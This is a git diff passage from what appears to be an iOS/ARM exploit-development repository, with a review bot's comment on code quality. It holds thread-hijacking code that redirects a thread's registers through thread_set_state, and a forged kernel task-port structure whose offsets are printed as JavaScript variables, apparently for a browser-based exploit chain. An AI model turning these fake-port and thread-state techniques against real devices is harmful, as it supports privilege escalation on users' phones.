+ mmap(0x2000000, 0x100000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, 0, 0);
+
+ char* test = malloc(0x100);
+ strcpy(test, "Hello, world! %x %x %x %x %x %x %x\n");
+
+ pthread_t thread;
+ pthread_create(&thread, NULL, lol2, NULL);
+
+ puts("test");
+
+// thread_create(mytask, &th);
+ th = pthread_mach_thread_np(thread);
+ printf("%x\n", mytask);
+ arm_thread_state_t state;
+ mach_msg_type_number_t count;
+ kr = thread_get_state(mythread, ARM_THREAD_STATE, (thread_state_t)&state, &count);
+
+ uint32_t* stack_above = 0x2001000;
+ stack_above[0] = 0x42069;
+ stack_above[1] = 0x69420;
+ stack_above[3] = 0x13371337;
+ stack_above[4] = 0x6969;
+
+// fprintf(stderr, "%p %p\n", test, dlsym(RTLD_DEFAULT, "puts"));
+
+// exit(42);
+
+// *(uint32_t*)0x41414141 = 0;
+
+// memset(&state, 0, ARM_THREAD_STATE_COUNT * sizeof(uint32_t));
+
+ for (int i = 0; i < 13; i++) {
+ fprintf(stderr, "r%d=%x\n", i, state.__r[i]);
+ }
+
+ *(uint32_t*)(0x346afc48 + 0x1b4c000) = 0x23d751fc + 0x1b4c000;
+
+ state.__r[0] = test;
+ state.__r[1] = 0x1337;
+ state.__r[2] = 0x420;
+ state.__r[3] = 0x69;
+ state.__sp = (uint32_t)stack_above;
+ state.__lr = 0x23d751fc + 0x1b4c000;
+ state.__pc = ((uint32_t)dlsym(RTLD_DEFAULT, "printf")) | 1;
+ state.__cpsr = 0x40000020;
+ kr = thread_set_state(th, ARM_THREAD_STATE, (thread_state_t)&state, ARM_THREAD_STATE_COUNT);
+ kr = thread_resume(th);
+// thread_call_enter((thread_call_func_t)&lol);
+
+ sleep(1);
+
+ return 0;
} \ No newline at end of file
diff --git a/tools/build.sh b/tools/build.sh
index 37f29b3..37f29b3 100644..100755
--- a/tools/build.sh
+++ b/tools/build.sh
diff --git a/tools/build_native.sh b/tools/build_native.sh
index 896562a..896562a 100644..100755
--- a/tools/build_native.sh
+++ b/tools/build_native.sh
diff --git a/tools/ent.xml b/tools/ent.xml
index 2973d1d..2973d1d 100644..100755
--- a/tools/ent.xml
+++ b/tools/ent.xml
diff --git a/tools/fuck_aslr.c b/tools/fuck_aslr.c
index c8e9714..c8e9714 100644..100755
--- a/tools/fuck_aslr.c
+++ b/tools/fuck_aslr.c
diff --git a/tools/fuck_ptr.c b/tools/fuck_ptr.c
index 25eab56..25eab56 100644..100755
--- a/tools/fuck_ptr.c
+++ b/tools/fuck_ptr.c
diff --git a/tools/jit_all_the_things.c b/tools/jit_all_the_things.c
index d955ea1..d955ea1 100644..100755
--- a/tools/jit_all_the_things.c
+++ b/tools/jit_all_the_things.c
diff --git a/tools/shit.c b/tools/shit.c
index 6fa80d4..1fe00cd 100644..100755
--- a/tools/shit.c
+++ b/tools/shit.c
@@ -1,63 +1,63 @@
-#include <mach/mach.h>
-#include <sys/mman.h>
-#include <stdio.h>
-
-int main(int argc, char* argv[]) {
- kern_return_t kr;
- thread_t th;
- mach_port_name_t mytask, mythread;
- arm_thread_state_t state;
- mach_msg_type_number_t count;
- printf("Hello, world!\n");
- mytask = mach_task_self();
- mythread = mach_thread_self();
-
- printf("%x %x %x %x %x %x %x %x %x %x %x %x\n", mytask, &th, th, &state, &count, 0x41414141);
- mmap(0x1300000, 0x100000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, 0, 0);
- printf("%x %x %x %x %x %x %x %x %x %x %x %x\n", mytask, &th, th, &state, &count, 0x41414141);
-
- *(uint32_t*)0x1301004 = 0x1300100;
- *(uint32_t*)0x1301008 = 0x1300200;
- *(uint32_t*)0x1301000 = 0x1300000;
-
- *(uint32_t*)0x1302000 = 0x1301000;
- *(uint32_t*)0x1302004 = 0x1301004;
- *(uint32_t*)0x1302008 = 0x1301008;
-
- *(uint32_t*)0x1304008 = 0x1303008;
- *(uint32_t*)0x1305008 = 0x1304008;
-
- printf("%d(%x) %d(%x)\n", ARM_THREAD_STATE, ARM_THREAD_STATE, ARM_THREAD_STATE_COUNT, ARM_THREAD_STATE_COUNT);
-
- // 707 10580c 105848 1057c8 1057c4 41414141 105850 1 0 0 0 0
- printf("%x %x %x %x %x %x %x %x %x %x %x %x\n", mytask, &th, th, &state, &count, 0x41414141);
-
- printf("still alive?\n");
- printf("%x\n", *(uint32_t*)0x1300000);
- kr = thread_create(mytask, 0x1300000);
- printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr));
-
- printf("%x\n", *(uint32_t*)0x1300000);
- printf("still alive?\n");
- kr = thread_get_state(0x1300000, ARM_THREAD_STATE, 0x1301008, 0x1301000);
-
- printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr));
- printf("still alive?\n");
- *(uint32_t*)0x1302008 = 0x41414141;
- kr = thread_set_state(0x1300000, ARM_THREAD_STATE, 0x1305008, ARM_THREAD_STATE_COUNT);
-
- printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr));
- kr = thread_get_state(0x1300000, ARM_THREAD_STATE, 0x1304008, 0x1301000);
-
- printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr));
- printf("%x\n", *(uint32_t*)0x1302008);
- printf("still alive?\n");
- kr = thread_resume(0x1300000);
-
- printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr));
- printf("still alive?\n");
-
- printf("still alive?\n");
-
- return 0;
+#include <mach/mach.h>
+#include <sys/mman.h>
+#include <stdio.h>
+
+int main(int argc, char* argv[]) {
+ kern_return_t kr;
+ thread_t th;
+ mach_port_name_t mytask, mythread;
+ arm_thread_state_t state;
+ mach_msg_type_number_t count;
+ printf("Hello, world!\n");
+ mytask = mach_task_self();
+ mythread = mach_thread_self();
+
+ printf("%x %x %x %x %x %x %x %x %x %x %x %x\n", mytask, &th, th, &state, &count, 0x41414141);
+ mmap(0x1300000, 0x100000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, 0, 0);
+ printf("%x %x %x %x %x %x %x %x %x %x %x %x\n", mytask, &th, th, &state, &count, 0x41414141);
+
+ *(uint32_t*)0x1301004 = 0x1300100;
+ *(uint32_t*)0x1301008 = 0x1300200;
+ *(uint32_t*)0x1301000 = 0x1300000;
+
+ *(uint32_t*)0x1302000 = 0x1301000;
+ *(uint32_t*)0x1302004 = 0x1301004;
+ *(uint32_t*)0x1302008 = 0x1301008;
+
+ *(uint32_t*)0x1304008 = 0x1303008;
+ *(uint32_t*)0x1305008 = 0x1304008;
+
+ printf("%d(%x) %d(%x)\n", ARM_THREAD_STATE, ARM_THREAD_STATE, ARM_THREAD_STATE_COUNT, ARM_THREAD_STATE_COUNT);
+
+ // 707 10580c 105848 1057c8 1057c4 41414141 105850 1 0 0 0 0
+ printf("%x %x %x %x %x %x %x %x %x %x %x %x\n", mytask, &th, th, &state, &count, 0x41414141);
+
+ printf("still alive?\n");
+ printf("%x\n", *(uint32_t*)0x1300000);
+ kr = thread_create(mytask, 0x1300000);
+ printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr));
+
+ printf("%x\n", *(uint32_t*)0x1300000);
+ printf("still alive?\n");
+ kr = thread_get_state(0x1300000, ARM_THREAD_STATE, 0x1301008, 0x1301000);
+
+ printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr));
+ printf("still alive?\n");
+ *(uint32_t*)0x1302008 = 0x41414141;
+ kr = thread_set_state(0x1300000, ARM_THREAD_STATE, 0x1305008, ARM_THREAD_STATE_COUNT);
+
+ printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr));
+ kr = thread_get_state(0x1300000, ARM_THREAD_STATE, 0x1304008, 0x1301000);
+
+ printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr));
+ printf("%x\n", *(uint32_t*)0x1302008);
+ printf("still alive?\n");
+ kr = thread_resume(0x1300000);
+
+ printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr));
+ printf("still alive?\n");
+
+ printf("still alive?\n");
+
+ return 0;
} \ No newline at end of file
diff --git a/tools/test.c b/tools/test.c
index 6682971..6682971 100644..100755
--- a/tools/test.c
+++ b/tools/test.c
diff --git a/tools/testlol.c b/tools/testlol.c
index 5849b99..362b6fa 100644..100755
--- a/tools/testlol.c
+++ b/tools/testlol.c
@@ -1,99 +1,101 @@
-#include <mach/mach.h>
-#include <stddef.h>
-#include <stdio.h>
-//#include <IOKit/IOKitLib.h>
-//#include <IOKit/iokitmig.h>
-
-typedef struct __attribute__((__packed__)) {
- uint32_t ip_bits;
- uint32_t ip_references;
- struct __attribute__((__packed__)) {
- uint32_t data;
- uint32_t pad;
- uint32_t type;
- } ip_lock;
- struct __attribute__((__packed__)) {
- struct __attribute__((__packed__)) {
- struct __attribute__((__packed__)) {
- uint32_t flags;
- uintptr_t waitq_interlock;
- uint64_t waitq_set_id;
- uint64_t waitq_prepost_id;
- struct __attribute__((__packed__)) {
- uintptr_t next;
- uintptr_t prev;
- } waitq_queue;
- } waitq;
- uintptr_t messages;
- natural_t seqno;
- natural_t receiver_name;
- uint16_t msgcount;
- uint16_t qlimit;
- } port;
- uintptr_t imq_klist;
- } ip_messages;
- natural_t ip_flags;
- uintptr_t ip_receiver;
- uintptr_t ip_kobject;
- uintptr_t ip_nsrequest;
- uintptr_t ip_pdrequest;
- uintptr_t ip_requests;
- uintptr_t ip_premsg;
- uint64_t ip_context;
- natural_t ip_mscount;
- natural_t ip_srights;
- natural_t ip_sorights;
-} kport_t;
-
-int main(int argc, char* argv[]) {
- printf("var MACH_PORT_RIGHT_RECEIVE = 0x%x;\n", MACH_PORT_RIGHT_RECEIVE);
- printf("var MACH_MSG_TYPE_MAKE_SEND = 0x%x;\n", MACH_MSG_TYPE_MAKE_SEND);
- printf("var MACH_PORT_LIMITS_INFO = 0x%x;\n", MACH_PORT_LIMITS_INFO);
- printf("var MACH_PORT_LIMITS_INFO_COUNT = 0x%x;\n", MACH_PORT_LIMITS_INFO_COUNT);
- printf("var MACH_MSG_OOL_PORTS_DESCRIPTOR = 0x%x;\n", MACH_MSG_OOL_PORTS_DESCRIPTOR);
- printf("var kport_size = 0x%x;\n", sizeof(kport_t));
- kport_t kport[2] = {};
- uintptr_t *ptr = (uintptr_t*)(kport + 1);
- kport->ip_bits = 0x80000002; // IO_BITS_ACTIVE | IOT_PORT | IKOT_TASK
- kport->ip_references = 100;
- kport->ip_lock.type = 0x11;
- kport->ip_messages.port.qlimit = 777;
- kport->ip_receiver = 0x12345678; // dummy
- kport->ip_srights = 99;
- typedef struct {
- mach_msg_header_t Head;
- mach_msg_body_t msgh_body;
- mach_msg_ool_ports_descriptor_t init_port_set[0];
- } Request;
-
- printf("%x\n", sizeof(Request));
- printf("%x\n", sizeof(mach_msg_ool_ports_descriptor_t));
- printf("var req_init_port_set = 0x%x\n", offsetof(Request, init_port_set));
- printf("var req_init_port_set_address = 0x%x\n", offsetof(mach_msg_ool_ports_descriptor_t, address));
- printf("var req_init_port_set_count = 0x%x\n", offsetof(mach_msg_ool_ports_descriptor_t, count));
-// printf("var req_init_port_set_disposition = 0x%x\n", offsetof(Request, init_port_set) + offsetof(mach_msg_ool_ports_descriptor_t, disposition));
-// printf("var req_init_port_set_deallocate = 0x%x\n", offsetof(Request, init_port_set) + offsetof(mach_msg_ool_ports_descriptor_t, deallocate));
-// printf("var req_init_port_set_type = 0x%x\n", offsetof(Request, init_port_set) + offsetof(mach_msg_ool_ports_descriptor_t, type));
- printf("var req_head_msgh_bits = 0x%x\n", offsetof(Request, Head.msgh_bits));
- printf("var req_head_msgh_request_port = 0x%x\n", offsetof(Request, Head.msgh_remote_port));
- printf("var req_head_msgh_reply_port = 0x%x\n", offsetof(Request, Head.msgh_local_port));
- printf("var req_head_msgh_id = 0x%x\n", offsetof(Request, Head.msgh_id));
- printf("var req_msgh_body_msgh_descriptor_count = 0x%x\n", offsetof(Request, msgh_body.msgh_descriptor_count));
-
- printf("%x\n", sizeof(mach_msg_header_t));
-
- printf("%x\n", MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE));
- printf("%x\n", MACH_SEND_MSG|MACH_MSG_OPTION_NONE);
- printf("%x\n", MACH_MSG_TIMEOUT_NONE);
-
- printf("var kport_ip_bits%x = 0x%x;\n", 4, offsetof(kport_t, ip_bits));
- printf("var kport_ip_references%x = 0x%x;\n", 4, offsetof(kport_t, ip_references));
- printf("var kport_ip_lock_type%x = 0x%x;\n", 4, offsetof(kport_t, ip_lock.type));
- printf("var kport_ip_messages_port_qlimit%x = 0x%x;\n", 2, offsetof(kport_t, ip_messages.port.qlimit));
- printf("var kport_ip_receiver%x = 0x%x;\n", 4, offsetof(kport_t, ip_receiver));
- printf("var kport_ip_srights%x = 0x%x;\n", 4, offsetof(kport_t, ip_srights));
- printf("var MIG_MAX = 0x%x\n", 0x1000);
- printf("var NDR_record = %x %x %x %x\n", NDR_record);
-
- return 0;
+#include <mach/mach.h>
+#include <sys/mman.h>
+#include <stddef.h>
+#include <stdio.h>
+//#include <IOKit/IOKitLib.h>
+//#include <IOKit/iokitmig.h>
+
+typedef struct __attribute__((__packed__)) {
+ uint32_t ip_bits;
+ uint32_t ip_references;
+ struct __attribute__((__packed__)) {
+ uint32_t data;
+ uint32_t pad;
+ uint32_t type;
+ } ip_lock;
+ struct __attribute__((__packed__)) {
+ struct __attribute__((__packed__)) {
+ struct __attribute__((__packed__)) {
+ uint32_t flags;
+ uintptr_t waitq_interlock;
+ uint64_t waitq_set_id;
+ uint64_t waitq_prepost_id;
+ struct __attribute__((__packed__)) {
+ uintptr_t next;
+ uintptr_t prev;
+ } waitq_queue;
+ } waitq;
+ uintptr_t messages;
+ natural_t seqno;
+ natural_t receiver_name;
+ uint16_t msgcount;
+ uint16_t qlimit;
+ } port;
+ uintptr_t imq_klist;
+ } ip_messages;
+ natural_t ip_flags;
+ uintptr_t ip_receiver;
+ uintptr_t ip_kobject;
+ uintptr_t ip_nsrequest;
+ uintptr_t ip_pdrequest;
+ uintptr_t ip_requests;
+ uintptr_t ip_premsg;
+ uint64_t ip_context;
+ natural_t ip_mscount;
+ natural_t ip_srights;
+ natural_t ip_sorights;
+} kport_t;
+
+int main(int argc, char* argv[]) {
+ printf("var MACH_PORT_RIGHT_RECEIVE = 0x%x;\n", MACH_PORT_RIGHT_RECEIVE);
+ printf("var MACH_MSG_TYPE_MAKE_SEND = 0x%x;\n", MACH_MSG_TYPE_MAKE_SEND);
+ printf("var MACH_PORT_LIMITS_INFO = 0x%x;\n", MACH_PORT_LIMITS_INFO);
+ printf("var MACH_PORT_LIMITS_INFO_COUNT = 0x%x;\n", MACH_PORT_LIMITS_INFO_COUNT);
+ printf("var MACH_MSG_OOL_PORTS_DESCRIPTOR = 0x%x;\n", MACH_MSG_OOL_PORTS_DESCRIPTOR);
+ printf("var kport_size = 0x%x;\n", sizeof(kport_t));
+ kport_t kport[2] = {};
+ uintptr_t *ptr = (uintptr_t*)(kport + 1);
+ kport->ip_bits = 0x80000002; // IO_BITS_ACTIVE | IOT_PORT | IKOT_TASK
+ kport->ip_references = 100;
+ kport->ip_lock.type = 0x11;
+ kport->ip_messages.port.qlimit = 777;
+ kport->ip_receiver = 0x12345678; // dummy
+ kport->ip_srights = 99;
+ typedef struct {
+ mach_msg_header_t Head;
+ mach_msg_body_t msgh_body;
+ mach_msg_ool_ports_descriptor_t init_port_set[0];
+ } Request;
+
+ printf("%x\n", sizeof(Request));
+ printf("%x\n", sizeof(mach_msg_ool_ports_descriptor_t));
+ printf("var req_init_port_set = 0x%x\n", offsetof(Request, init_port_set));
+ printf("var req_init_port_set_address = 0x%x\n", offsetof(mach_msg_ool_ports_descriptor_t, address));
+ printf("var req_init_port_set_count = 0x%x\n", offsetof(mach_msg_ool_ports_descriptor_t, count));
+ printf("%x %x %x %x %x\n", PROT_READ, PROT_WRITE, PROT_EXEC, MAP_PRIVATE, MAP_ANON);
+// printf("var req_init_port_set_disposition = 0x%x\n", offsetof(Request, init_port_set) + offsetof(mach_msg_ool_ports_descriptor_t, disposition));
+// printf("var req_init_port_set_deallocate = 0x%x\n", offsetof(Request, init_port_set) + offsetof(mach_msg_ool_ports_descriptor_t, deallocate));
+// printf("var req_init_port_set_type = 0x%x\n", offsetof(Request, init_port_set) + offsetof(mach_msg_ool_ports_descriptor_t, type));
+ printf("var req_head_msgh_bits = 0x%x\n", offsetof(Request, Head.msgh_bits));
+ printf("var req_head_msgh_request_port = 0x%x\n", offsetof(Request, Head.msgh_remote_port));
+ printf("var req_head_msgh_reply_port = 0x%x\n", offsetof(Request, Head.msgh_local_port));
+ printf("var req_head_msgh_id = 0x%x\n", offsetof(Request, Head.msgh_id));
+ printf("var req_msgh_body_msgh_descriptor_count = 0x%x\n", offsetof(Request, msgh_body.msgh_descriptor_count));
+
+ printf("%x\n", sizeof(mach_msg_header_t));
+
+ printf("%x\n", MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE));
+ printf("%x\n", MACH_SEND_MSG|MACH_MSG_OPTION_NONE);
+ printf("%x\n", MACH_MSG_TIMEOUT_NONE);
+
+ printf("var kport_ip_bits%x = 0x%x;\n", 4, offsetof(kport_t, ip_bits));
+ printf("var kport_ip_references%x = 0x%x;\n", 4, offsetof(kport_t, ip_references));
+ printf("var kport_ip_lock_type%x = 0x%x;\n", 4, offsetof(kport_t, ip_lock.type));
+ printf("var kport_ip_messages_port_qlimit%x = 0x%x;\n", 2, offsetof(kport_t, ip_messages.port.qlimit));
+ printf("var kport_ip_receiver%x = 0x%x;\n", 4, offsetof(kport_t, ip_receiver));
+ printf("var kport_ip_srights%x = 0x%x;\n", 4, offsetof(kport_t, ip_srights));
+ printf("var MIG_MAX = 0x%x\n", 0x1000);
+ printf("var NDR_record = %x %x %x %x\n", NDR_record);
+
+ return 0;
} \ No newline at end of file
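Review bot: `printf("var NDR_record = %x %x %x %x\n", NDR_record);` near the end of the new main() passes a struct by value into variadic slots that `%x` reads as unsigned int, which is undefined behaviour and means the emitted constant is whatever happened to sit in the next argument slots; print the bytes through a pointer instead, e.g. `const unsigned char *nb = (const unsigned char *)&NDR_record;` followed by `printf("var NDR_record = %x %x %x %x\n", nb[0], nb[1], nb[2], nb[3]);`, with the specifier count matched to `sizeof(NDR_record)` (how the generated line is consumed is not visible here). The same hunk pairs `%x` with the `size_t` results of `sizeof` and `offsetof` throughout (for example `printf("var kport_size = 0x%x;\n", sizeof(kport_t));`), where `%zx` is the portable specifier and also silences -Wformat. `uintptr_t *ptr = (uintptr_t*)(kport + 1);` is assigned and never read, so it can be dropped. Since the only content changes are the added `#include <sys/mman.h>` and the `PROT_READ, PROT_WRITE, PROT_EXEC, MAP_PRIVATE, MAP_ANON` printf, the whole-file rewrite looks like a line-ending change riding along with the mode bump; normalising endings in its own commit would keep the two real lines reviewable.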
diff --git a/tools/thread_shit.c b/tools/thread_shit.c
index cbfbe23..cbfbe23 100644..100755
--- a/tools/thread_shit.c
+++ b/tools/thread_shit.c